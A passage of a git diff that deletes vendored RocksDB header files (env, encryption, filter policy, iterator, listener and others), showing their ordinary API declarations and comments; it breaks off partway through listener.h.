-  Status Allocate(uint64_t offset, uint64_t len) override {
-    return target_->Allocate(offset, len);
-  }
-  Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-    return target_->RangeSync(offset, nbytes);
-  }
-
- private:
-  WritableFile* target_;
-};
-
-// Returns a new environment that stores its data in memory and delegates
-// all non-file-storage tasks to base_env. The caller must delete the result
-// when it is no longer needed.
-// *base_env must remain live while the result is in use.
-Env* NewMemEnv(Env* base_env);
-
-// Returns a new environment that is used for HDFS environment.
-// This is a factory method for HdfsEnv declared in hdfs/env_hdfs.h
-Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname);
-
-// Returns a new environment that measures function call times for filesystem
-// operations, reporting results to variables in PerfContext.
-// This is a factory method for TimedEnv defined in utilities/env_timed.cc.
-Env* NewTimedEnv(Env* base_env);
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_ENV_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/env_encryption.h b/thirdparty/rocksdb/include/rocksdb/env_encryption.h
deleted file mode 100644
index e4c924a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/env_encryption.h
+++ /dev/null
@@ -1,196 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if !defined(ROCKSDB_LITE) 
-
-#include <string>
-
-#include "env.h"
-
-namespace rocksdb {
-
-class EncryptionProvider;
-
-// Returns an Env that encrypts data when stored on disk and decrypts data when 
-// read from disk.
-Env* NewEncryptedEnv(Env* base_env, EncryptionProvider* provider);
-
-// BlockAccessCipherStream is the base class for any cipher stream that 
-// supports random access at block level (without requiring data from other blocks).
-// E.g. CTR (Counter operation mode) supports this requirement.
-class BlockAccessCipherStream {
-    public:
-      virtual ~BlockAccessCipherStream() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() = 0;
-
-      // Encrypt one or more (partial) blocks of data at the file offset.
-      // Length of data is given in dataSize.
-      virtual Status Encrypt(uint64_t fileOffset, char *data, size_t dataSize);
-
-      // Decrypt one or more (partial) blocks of data at the file offset.
-      // Length of data is given in dataSize.
-      virtual Status Decrypt(uint64_t fileOffset, char *data, size_t dataSize);
-
-    protected:
-      // Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-      virtual void AllocateScratch(std::string&) = 0;
-
-      // Encrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status EncryptBlock(uint64_t blockIndex, char *data, char* scratch) = 0;
-
-      // Decrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status DecryptBlock(uint64_t blockIndex, char *data, char* scratch) = 0;
-};
-
-// BlockCipher 
-class BlockCipher {
-    public:
-      virtual ~BlockCipher() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() = 0;
-
-      // Encrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Encrypt(char *data) = 0;
-
-      // Decrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Decrypt(char *data) = 0;
-};
-
-// Implements a BlockCipher using ROT13.
-//
-// Note: This is a sample implementation of BlockCipher, 
-// it is NOT considered safe and should NOT be used in production.
-class ROT13BlockCipher : public BlockCipher {
-    private: 
-      size_t blockSize_;
-    public:
-      ROT13BlockCipher(size_t blockSize) 
-        : blockSize_(blockSize) {}
-      virtual ~ROT13BlockCipher() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() override { return blockSize_; }
-
-      // Encrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Encrypt(char *data) override;
-
-      // Decrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Decrypt(char *data) override;
-};
-
-// CTRCipherStream implements BlockAccessCipherStream using an 
-// Counter operations mode. 
-// See https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
-//
-// Note: This is a possible implementation of BlockAccessCipherStream, 
-// it is considered suitable for use.
-class CTRCipherStream final : public BlockAccessCipherStream {
-    private:
-      BlockCipher& cipher_;
-      std::string iv_;
-      uint64_t initialCounter_;
-    public:
-      CTRCipherStream(BlockCipher& c, const char *iv, uint64_t initialCounter) 
-        : cipher_(c), iv_(iv, c.BlockSize()), initialCounter_(initialCounter) {};
-      virtual ~CTRCipherStream() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() override { return cipher_.BlockSize(); }
-
-    protected:
-      // Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-      virtual void AllocateScratch(std::string&) override;
-
-      // Encrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status EncryptBlock(uint64_t blockIndex, char *data, char *scratch) override;
-
-      // Decrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status DecryptBlock(uint64_t blockIndex, char *data, char *scratch) override;
-};
-
-// The encryption provider is used to create a cipher stream for a specific file.
-// The returned cipher stream will be used for actual encryption/decryption 
-// actions.
-class EncryptionProvider {
- public:
-    virtual ~EncryptionProvider() {};
-
-    // GetPrefixLength returns the length of the prefix that is added to every file
-    // and used for storing encryption options.
-    // For optimal performance, the prefix length should be a multiple of 
-    // the a page size.
-    virtual size_t GetPrefixLength() = 0;
-
-    // CreateNewPrefix initialized an allocated block of prefix memory 
-    // for a new file.
-    virtual Status CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) = 0;
-
-    // CreateCipherStream creates a block access cipher stream for a file given
-    // given name and options.
-    virtual Status CreateCipherStream(const std::string& fname, const EnvOptions& options,
-      Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) = 0;
-};
-
-// This encryption provider uses a CTR cipher stream, with a given block cipher 
-// and IV.
-//
-// Note: This is a possible implementation of EncryptionProvider, 
-// it is considered suitable for use, provided a safe BlockCipher is used.
-class CTREncryptionProvider : public EncryptionProvider {
-    private:
-      BlockCipher& cipher_;
-    protected:
-      const static size_t defaultPrefixLength = 4096;
-
- public:
-      CTREncryptionProvider(BlockCipher& c) 
-        : cipher_(c) {};
-    virtual ~CTREncryptionProvider() {}
-
-    // GetPrefixLength returns the length of the prefix that is added to every file
-    // and used for storing encryption options.
-    // For optimal performance, the prefix length should be a multiple of 
-    // the a page size.
-    virtual size_t GetPrefixLength() override;
-
-    // CreateNewPrefix initialized an allocated block of prefix memory 
-    // for a new file.
-    virtual Status CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) override;
-
-    // CreateCipherStream creates a block access cipher stream for a file given
-    // given name and options.
-    virtual Status CreateCipherStream(const std::string& fname, const EnvOptions& options,
-      Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) override;
-
-  protected:
-    // PopulateSecretPrefixPart initializes the data into a new prefix block 
-    // that will be encrypted. This function will store the data in plain text. 
-    // It will be encrypted later (before written to disk).
-    // Returns the amount of space (starting from the start of the prefix)
-    // that has been initialized.
-    virtual size_t PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize);
-
-    // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given
-    // given name and options. The given prefix is already decrypted.
-    virtual Status CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options,
-      uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr<BlockAccessCipherStream>* result);
-};
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/include/rocksdb/experimental.h b/thirdparty/rocksdb/include/rocksdb/experimental.h
deleted file mode 100644
index 0592fe3..0000000
--- a/thirdparty/rocksdb/include/rocksdb/experimental.h
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-namespace experimental {
-
-// Supported only for Leveled compaction
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end);
-Status SuggestCompactRange(DB* db, const Slice* begin, const Slice* end);
-
-// Move all L0 files to target_level skipping compaction.
-// This operation succeeds only if the files in L0 have disjoint ranges; this
-// is guaranteed to happen, for instance, if keys are inserted in sorted
-// order. Furthermore, all levels between 1 and target_level must be empty.
-// If any of the above condition is violated, InvalidArgument will be
-// returned.
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family,
-                 int target_level = 1);
-
-}  // namespace experimental
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/filter_policy.h b/thirdparty/rocksdb/include/rocksdb/filter_policy.h
deleted file mode 100644
index 8add48e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/filter_policy.h
+++ /dev/null
@@ -1,145 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A database can be configured with a custom FilterPolicy object.
-// This object is responsible for creating a small filter from a set
-// of keys.  These filters are stored in rocksdb and are consulted
-// automatically by rocksdb to decide whether or not to read some
-// information from disk. In many cases, a filter can cut down the
-// number of disk seeks form a handful to a single disk seek per
-// DB::Get() call.
-//
-// Most people will want to use the builtin bloom filter support (see
-// NewBloomFilterPolicy() below).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
-#define STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
-
-#include <memory>
-#include <stdexcept>
-#include <stdlib.h>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-
-// A class that takes a bunch of keys, then generates filter
-class FilterBitsBuilder {
- public:
-  virtual ~FilterBitsBuilder() {}
-
-  // Add Key to filter, you could use any way to store the key.
-  // Such as: storing hashes or original keys
-  // Keys are in sorted order and duplicated keys are possible.
-  virtual void AddKey(const Slice& key) = 0;
-
-  // Generate the filter using the keys that are added
-  // The return value of this function would be the filter bits,
-  // The ownership of actual data is set to buf
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) = 0;
-
-  // Calculate num of entries fit into a space.
-  virtual int CalculateNumEntry(const uint32_t space) {
-#ifndef ROCKSDB_LITE
-    throw std::runtime_error("CalculateNumEntry not Implemented");
-#else
-    abort();
-#endif
-    return 0;
-  }
-};
-
-// A class that checks if a key can be in filter
-// It should be initialized by Slice generated by BitsBuilder
-class FilterBitsReader {
- public:
-  virtual ~FilterBitsReader() {}
-
-  // Check if the entry match the bits in filter
-  virtual bool MayMatch(const Slice& entry) = 0;
-};
-
-// We add a new format of filter block called full filter block
-// This new interface gives you more space of customization
-//
-// For the full filter block, you can plug in your version by implement
-// the FilterBitsBuilder and FilterBitsReader
-//
-// There are two sets of interface in FilterPolicy
-// Set 1: CreateFilter, KeyMayMatch: used for blockbased filter
-// Set 2: GetFilterBitsBuilder, GetFilterBitsReader, they are used for
-// full filter.
-// Set 1 MUST be implemented correctly, Set 2 is optional
-// RocksDB would first try using functions in Set 2. if they return nullptr,
-// it would use Set 1 instead.
-// You can choose filter type in NewBloomFilterPolicy
-class FilterPolicy {
- public:
-  virtual ~FilterPolicy();
-
-  // Return the name of this policy.  Note that if the filter encoding
-  // changes in an incompatible way, the name returned by this method
-  // must be changed.  Otherwise, old incompatible filters may be
-  // passed to methods of this type.
-  virtual const char* Name() const = 0;
-
-  // keys[0,n-1] contains a list of keys (potentially with duplicates)
-  // that are ordered according to the user supplied comparator.
-  // Append a filter that summarizes keys[0,n-1] to *dst.
-  //
-  // Warning: do not change the initial contents of *dst.  Instead,
-  // append the newly constructed filter to *dst.
-  virtual void CreateFilter(const Slice* keys, int n, std::string* dst)
-      const = 0;
-
-  // "filter" contains the data appended by a preceding call to
-  // CreateFilter() on this class.  This method must return true if
-  // the key was in the list of keys passed to CreateFilter().
-  // This method may return true or false if the key was not on the
-  // list, but it should aim to return false with a high probability.
-  virtual bool KeyMayMatch(const Slice& key, const Slice& filter) const = 0;
-
-  // Get the FilterBitsBuilder, which is ONLY used for full filter block
-  // It contains interface to take individual key, then generate filter
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const {
-    return nullptr;
-  }
-
-  // Get the FilterBitsReader, which is ONLY used for full filter block
-  // It contains interface to tell if key can be in filter
-  // The input slice should NOT be deleted by FilterPolicy
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const {
-    return nullptr;
-  }
-};
-
-// Return a new filter policy that uses a bloom filter with approximately
-// the specified number of bits per key.
-//
-// bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-// is 10, which yields a filter with ~ 1% false positive rate.
-// use_block_based_builder: use block based filter rather than full filter.
-// If you want to builder full filter, it needs to be set to false.
-//
-// Callers must delete the result after any database that is using the
-// result has been closed.
-//
-// Note: if you are using a custom comparator that ignores some parts
-// of the keys being compared, you must not use NewBloomFilterPolicy()
-// and must provide your own FilterPolicy that also ignores the
-// corresponding parts of the keys.  For example, if the comparator
-// ignores trailing spaces, it would be incorrect to use a
-// FilterPolicy (like NewBloomFilterPolicy) that does not ignore
-// trailing spaces in keys.
-extern const FilterPolicy* NewBloomFilterPolicy(int bits_per_key,
-    bool use_block_based_builder = true);
-}
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h b/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h
deleted file mode 100644
index 5daa967..0000000
--- a/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h
+++ /dev/null
@@ -1,62 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-class Slice;
-class BlockBuilder;
-struct Options;
-
-// FlushBlockPolicy provides a configurable way to determine when to flush a
-// block in the block based tables,
-class FlushBlockPolicy {
- public:
-  // Keep track of the key/value sequences and return the boolean value to
-  // determine if table builder should flush current data block.
-  virtual bool Update(const Slice& key,
-                      const Slice& value) = 0;
-
-  virtual ~FlushBlockPolicy() { }
-};
-
-class FlushBlockPolicyFactory {
- public:
-  // Return the name of the flush block policy.
-  virtual const char* Name() const = 0;
-
-  // Return a new block flush policy that flushes data blocks by data size.
-  // FlushBlockPolicy may need to access the metadata of the data block
-  // builder to determine when to flush the blocks.
-  //
-  // Callers must delete the result after any database that is using the
-  // result has been closed.
-  virtual FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const = 0;
-
-  virtual ~FlushBlockPolicyFactory() { }
-};
-
-class FlushBlockBySizePolicyFactory : public FlushBlockPolicyFactory {
- public:
-  FlushBlockBySizePolicyFactory() {}
-
-  const char* Name() const override { return "FlushBlockBySizePolicyFactory"; }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const override;
-
-  static FlushBlockPolicy* NewFlushBlockPolicy(
-      const uint64_t size, const int deviation,
-      const BlockBuilder& data_block_builder);
-};
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/iostats_context.h b/thirdparty/rocksdb/include/rocksdb/iostats_context.h
deleted file mode 100644
index 77a5964..0000000
--- a/thirdparty/rocksdb/include/rocksdb/iostats_context.h
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <stdint.h>
-#include <string>
-
-#include "rocksdb/perf_level.h"
-
-// A thread local context for gathering io-stats efficiently and transparently.
-// Use SetPerfLevel(PerfLevel::kEnableTime) to enable time stats.
-
-namespace rocksdb {
-
-struct IOStatsContext {
-  // reset all io-stats counter to zero
-  void Reset();
-
-  std::string ToString(bool exclude_zero_counters = false) const;
-
-  // the thread pool id
-  uint64_t thread_pool_id;
-
-  // number of bytes that has been written.
-  uint64_t bytes_written;
-  // number of bytes that has been read.
-  uint64_t bytes_read;
-
-  // time spent in open() and fopen().
-  uint64_t open_nanos;
-  // time spent in fallocate().
-  uint64_t allocate_nanos;
-  // time spent in write() and pwrite().
-  uint64_t write_nanos;
-  // time spent in read() and pread()
-  uint64_t read_nanos;
-  // time spent in sync_file_range().
-  uint64_t range_sync_nanos;
-  // time spent in fsync
-  uint64_t fsync_nanos;
-  // time spent in preparing write (fallocate etc).
-  uint64_t prepare_write_nanos;
-  // time spent in Logger::Logv().
-  uint64_t logger_nanos;
-};
-
-// Get Thread-local IOStatsContext object pointer
-IOStatsContext* get_iostats_context();
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/iterator.h b/thirdparty/rocksdb/include/rocksdb/iterator.h
deleted file mode 100644
index d4ac528..0000000
--- a/thirdparty/rocksdb/include/rocksdb/iterator.h
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An iterator yields a sequence of key/value pairs from a source.
-// The following class defines the interface.  Multiple implementations
-// are provided by this library.  In particular, iterators are provided
-// to access the contents of a Table or a DB.
-//
-// Multiple threads can invoke const methods on an Iterator without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Iterator must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
-
-#include <string>
-#include "rocksdb/cleanable.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Iterator : public Cleanable {
- public:
-  Iterator() {}
-  virtual ~Iterator() {}
-
-  // An iterator is either positioned at a key/value pair, or
-  // not valid.  This method returns true iff the iterator is valid.
-  virtual bool Valid() const = 0;
-
-  // Position at the first key in the source.  The iterator is Valid()
-  // after this call iff the source is not empty.
-  virtual void SeekToFirst() = 0;
-
-  // Position at the last key in the source.  The iterator is
-  // Valid() after this call iff the source is not empty.
-  virtual void SeekToLast() = 0;
-
-  // Position at the first key in the source that at or past target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or past target.
-  virtual void Seek(const Slice& target) = 0;
-
-  // Position at the last key in the source that at or before target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or before target.
-  virtual void SeekForPrev(const Slice& target) {}
-
-  // Moves to the next entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the last entry in the source.
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Moves to the previous entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the first entry in source.
-  // REQUIRES: Valid()
-  virtual void Prev() = 0;
-
-  // Return the key for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: Valid()
-  virtual Slice key() const = 0;
-
-  // Return the value for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: !AtEnd() && !AtStart()
-  virtual Slice value() const = 0;
-
-  // If an error has occurred, return it.  Else return an ok status.
-  // If non-blocking IO is requested and this operation cannot be
-  // satisfied without doing some IO, then this returns Status::Incomplete().
-  virtual Status status() const = 0;
-
-  // If supported, renew the iterator to represent the latest state. The
-  // iterator will be invalidated after the call. Not supported if
-  // ReadOptions.snapshot is given when creating the iterator.
-  virtual Status Refresh() {
-    return Status::NotSupported("Refresh() is not supported");
-  }
-
-  // Property "rocksdb.iterator.is-key-pinned":
-  //   If returning "1", this means that the Slice returned by key() is valid
-  //   as long as the iterator is not deleted.
-  //   It is guaranteed to always return "1" if
-  //      - Iterator created with ReadOptions::pin_data = true
-  //      - DB tables were created with
-  //        BlockBasedTableOptions::use_delta_encoding = false.
-  // Property "rocksdb.iterator.super-version-number":
-  //   LSM version used by the iterator. The same format as DB Property
-  //   kCurrentSuperVersionNumber. See its comment for more information.
-  virtual Status GetProperty(std::string prop_name, std::string* prop);
-
- private:
-  // No copying allowed
-  Iterator(const Iterator&);
-  void operator=(const Iterator&);
-};
-
-// Return an empty iterator (yields nothing).
-extern Iterator* NewEmptyIterator();
-
-// Return an empty iterator with the specified status.
-extern Iterator* NewErrorIterator(const Status& status);
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/ldb_tool.h b/thirdparty/rocksdb/include/rocksdb/ldb_tool.h
deleted file mode 100644
index 0ec2da9..0000000
--- a/thirdparty/rocksdb/include/rocksdb/ldb_tool.h
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <string>
-#include <vector>
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-// An interface for converting a slice to a readable string
-class SliceFormatter {
- public:
-  virtual ~SliceFormatter() {}
-  virtual std::string Format(const Slice& s) const = 0;
-};
-
-// Options for customizing ldb tool (beyond the DB Options)
-struct LDBOptions {
-  // Create LDBOptions with default values for all fields
-  LDBOptions();
-
-  // Key formatter that converts a slice to a readable string.
-  // Default: Slice::ToString()
-  std::shared_ptr<SliceFormatter> key_formatter;
-
-  std::string print_help_header = "ldb - RocksDB Tool";
-};
-
-class LDBTool {
- public:
-  void Run(
-      int argc, char** argv, Options db_options = Options(),
-      const LDBOptions& ldb_options = LDBOptions(),
-      const std::vector<ColumnFamilyDescriptor>* column_families = nullptr);
-};
-
-} // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/listener.h b/thirdparty/rocksdb/include/rocksdb/listener.h
deleted file mode 100644
index e132033..0000000
--- a/thirdparty/rocksdb/include/rocksdb/listener.h
+++ /dev/null
@@ -1,391 +0,0 @@
-// Copyright (c) 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-
-namespace rocksdb {
-
-typedef std::unordered_map<std::string, std::shared_ptr<const TableProperties>>
-    TablePropertiesCollection;
-
-class DB;
-class ColumnFamilyHandle;
-class Status;
-struct CompactionJobStats;
-enum CompressionType : unsigned char;
-
-enum class TableFileCreationReason {
-  kFlush,
-  kCompaction,
-  kRecovery,
-};
-
-struct TableFileCreationBriefInfo {
-  // the name of the database where the file was created
-  std::string db_name;
-  // the name of the column family where the file was created.
-  std::string cf_name;
-  // the path to the created file.
-  std::string file_path;
-  // the id of the job (which could be flush or compaction) that
-  // created the file.
-  int job_id;
-  // reason of creating the table.
-  TableFileCreationReason reason;
-};
-
-struct TableFileCreationInfo : public TableFileCreationBriefInfo {
-  TableFileCreationInfo() = default;
-  explicit TableFileCreationInfo(TableProperties&& prop)
-      : table_properties(prop) {}
-  // the size of the file.
-  uint64_t file_size;
-  // Detailed properties of the created file.
-  TableProperties table_properties;
-  // The status indicating whether the creation was successful or not.
-  Status status;
-};
-
-enum class CompactionReason {
-  kUnknown,
-  // [Level] number of L0 files > level0_file_num_compaction_trigger
-  kLevelL0FilesNum,
-  // [Level] total size of level > MaxBytesForLevel()
-  kLevelMaxLevelSize,
-  // [Universal] Compacting for size amplification
-  kUniversalSizeAmplification,
-  // [Universal] Compacting for size ratio
-  kUniversalSizeRatio,
-  // [Universal] number of sorted runs > level0_file_num_compaction_trigger
-  kUniversalSortedRunNum,
-  // [FIFO] total size > max_table_files_size
-  kFIFOMaxSize,
-  // [FIFO] reduce number of files.
-  kFIFOReduceNumFiles,
-  // [FIFO] files with creation time < (current_time - interval)
-  kFIFOTtl,
-  // Manual compaction
-  kManualCompaction,
-  // DB::SuggestCompactRange() marked files for compaction
-  kFilesMarkedForCompaction,
-};
-
-enum class BackgroundErrorReason {
-  kFlush,
-  kCompaction,
-  kWriteCallback,
-  kMemTable,
-};
-
-#ifndef ROCKSDB_LITE
-
-struct TableFileDeletionInfo {
-  // The name of the database where the file was deleted.
-  std::string db_name;
-  // The path to the deleted file.
-  std::string file_path;
-  // The id of the job which deleted the file.
-  int job_id;
-  // The status indicating whether the deletion was successful or not.
-  Status status;
-};
-
-struct FlushJobInfo {
-  // the name of the column family
-  std::string cf_name;
-  // the path to the newly created file
-  std::string file_path;
-  // the id of the thread that completed this flush job.
-  uint64_t thread_id;
-  // the job id, which is unique in the same thread.
-  int job_id;
-  // If true, then rocksdb is currently slowing-down all writes to prevent
-  // creating too many Level 0 files as compaction seems not able to
-  // catch up the write request speed.  This indicates that there are
-  // too many files in Level 0.
-  bool triggered_writes_slowdown;
-  // If true, then rocksdb is currently blocking any writes to prevent
-  // creating more L0 files.  This indicates that there are too many
-  // files in level 0.  Compactions should try to compact L0 files down
-  // to lower levels as soon as possible.
-  bool triggered_writes_stop;
-  // The smallest sequence number in the newly created file
-  SequenceNumber smallest_seqno;
-  // The largest sequence number in the newly created file
-  SequenceNumber largest_seqno;
-  // Table properties of the table being flushed
-  TableProperties table_properties;
-};
-
-struct CompactionJobInfo {
-  CompactionJobInfo() = default;
-  explicit CompactionJobInfo(const CompactionJobStats& _stats) :
-      stats(_stats) {}
-
-  // the name of the column family where the compaction happened.
-  std::string cf_name;
-  // the status indicating whether the compaction was successful or not.
-  Status status;
-  // the id of the thread that completed this compaction job.
-  uint64_t thread_id;
-  // the job id, which is unique in the same thread.
-  int job_id;
-  // the smallest input level of the compaction.
-  int base_input_level;
-  // the output level of the compaction.
-  int output_level;
-  // the names of the compaction input files.
-  std::vector<std::string> input_files;
-
-  // the names of the compaction output files.
-  std::vector<std::string> output_files;
-  // Table properties for input and output tables.
-  // The map is keyed by values from input_files and output_files.
-  TablePropertiesCollection table_properties;
-
-  // Reason to run the compaction
-  CompactionReason compaction_reason;
-
-  // Compression algorithm used for output files
-  CompressionType compression;
-
-  // If non-null, this variable stores detailed information
-  // about this compaction.
-  CompactionJobStats stats;
-};
-
-struct MemTableInfo {
-  // the name of the column family to which memtable belongs
-  std::string cf_name;
-  // Sequence number of the first element that was inserted
-  // into the memtable.
-  SequenceNumber first_seqno;
-  // Sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into this
-  // memtable. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  SequenceNumber earliest_seqno;
-  // Total number of entries in memtable
-  uint64_t num_entries;
-  // Total number of deletes in memtable
-  uint64_t num_deletes;
-
-};
-
-struct ExternalFileIngestionInfo {
-  // the name of the column family
-  std::string cf_name;
-  // Path of the file outside the DB
-  std::string external_file_path;
-  // Path of the file inside the DB
-  std::string internal_file_path;
-  // The global sequence number assigned to keys in this file
-  SequenceNumber global_seqno;
-  // Table properties of the table being flushed
-  TableProperties table_properties;
-};
-
-// A call-back function to RocksDB which will be called when the compaction
-// iterator is compacting values. It is mean to be returned from
-// EventListner::GetCompactionEventListner() at the beginning of compaction
-// job.
-class CompactionEventListener {
- public:
-  enum CompactionListenerValueType {
-    kValue,
-    kMergeOperand,
-    kDelete,
-    kSingleDelete,
-    kRangeDelete,
-    kBlobIndex,
-    kInvalid,
-  };
-
-  virtual void OnCompaction(int level, const Slice& key,
-                            CompactionListenerValueType value_type,
-                            const Slice& existing_value,
-                            const SequenceNumber& sn, bool is_new) = 0;
-
-  virtual ~CompactionEventListener() = default;
-};
-
-// EventListener class contains a set of call-back functions that will
-// be called when specific RocksDB event happens such as flush.  It can
-// be used as a building block for developing custom features such as
-// stats-collector or external compaction algorithm.
-//
-// Note that call-back functions should not run for an extended period of
-// time before the function returns, otherwise RocksDB may be blocked.
-// For example, it is not suggested to do DB::CompactFiles() (as it may
-// run for a long while) or issue many of DB::Put() (as Put may be blocked
-// in certain cases) in the same thread in the EventListener callback.
-// However, doing DB::CompactFiles() and DB::Put() in another thread is
-// considered safe.
-//
-// [Threading] All EventListener callback will be called using the
-// actual thread that involves in that specific event.   For example, it
-// is the RocksDB background flush thread that does the actual flush to
-// call EventListener::OnFlushCompleted().
-//
-// [Locking] All EventListener callbacks are designed to be called without
-// the current thread holding any DB mutex. This is to prevent potential
-// deadlock and performance issue when using EventListener callback
-// in a complex way. However, all EventListener call-back functions
-// should not run for an extended period of time before the function
-// returns, otherwise RocksDB may be blocked. For example, it is not
-// suggested to do DB::CompactFiles() (as it may run for a long while)
